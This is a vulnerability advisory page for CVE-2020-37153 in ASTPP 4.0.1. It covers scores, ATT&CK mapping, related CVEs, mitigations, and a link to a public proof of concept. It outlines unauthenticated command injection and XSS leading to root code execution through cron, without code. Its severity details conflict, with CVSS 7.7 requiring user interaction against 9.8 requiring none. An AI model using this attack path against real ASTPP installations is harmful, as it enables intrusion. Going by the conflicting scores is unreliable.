Cyber Resilience

CVE-2020-37153

HighPublic PoC

Published: 11 February 2026

Published
11 February 2026
Modified
20 February 2026
KEV Added
Patch
CVSS Score v4 7.7 CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0443 90.1th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2020-37153 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Inextrix Astpp. Its CVSS base score is 7.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 9.9% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

CVE-2020-37153 is a set of multiple vulnerabilities in ASTPP 4.0.1, including cross-site scripting (CWE-79) and command injection flaws within the SIP device configuration and plugin management interfaces. ASTPP is an open-source VoIP billing and provisioning system. The vulnerability carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), reflecting its critical severity due to the potential for high-impact remote exploitation.

Unauthenticated attackers can exploit these issues remotely over the network with low complexity and no user interaction required. Exploitation enables injection of system commands, hijacking of administrator sessions via cross-site scripting, and execution of arbitrary code with root permissions through manipulation of cron tasks, compromising confidentiality, integrity, and availability.

Advisories and related resources include the official ASTPP GitHub repository at https://github.com/iNextrix/ASTPP, the project website at https://www.astppbilling.org/, a proof-of-concept exploit on Exploit-DB at https://www.exploit-db.com/exploits/47889, and a VulnCheck advisory detailing ASTPP VoIP remote code execution at https://www.vulncheck.com/advisories/astpp-voip-remote-code-execution. Practitioners should consult these for mitigation guidance and patch details.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

ASTPP 4.0.1 contains multiple vulnerabilities including cross-site scripting and command injection in SIP device configuration and plugin management interfaces. Attackers can exploit these flaws to inject system commands, hijack administrator sessions, and potentially execute arbitrary code with root permissions through…

more

cron task manipulation.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Unauthenticated command injection in public-facing web interfaces enables remote exploitation of public-facing application (T1190) and Unix shell command execution (T1059.004); XSS facilitates session hijacking but primarily covered under exploitation.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2020-37104Same product: Inextrix Astpp
CVE-2024-56060Shared CWE-79
CVE-2022-50908Shared CWE-79
CVE-2026-44669Shared CWE-79
CVE-2025-23882Shared CWE-79
CVE-2025-68501Shared CWE-79
CVE-2025-49043Shared CWE-79
CVE-2025-69316Shared CWE-79
CVE-2025-50006Shared CWE-79
CVE-2025-14320Shared CWE-79

Affected Assets

inextrix
astpp
4.0.1

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly remediates the XSS and command injection flaws in ASTPP's SIP device configuration and plugin management interfaces through timely patching and flaw correction.

prevent

Prevents command injection and XSS exploitation by validating and sanitizing all user inputs to the vulnerable SIP device configuration and plugin management interfaces.

prevent

Enforces authentication and authorization to block unauthenticated remote access to the exploited SIP device configuration and plugin management interfaces.

References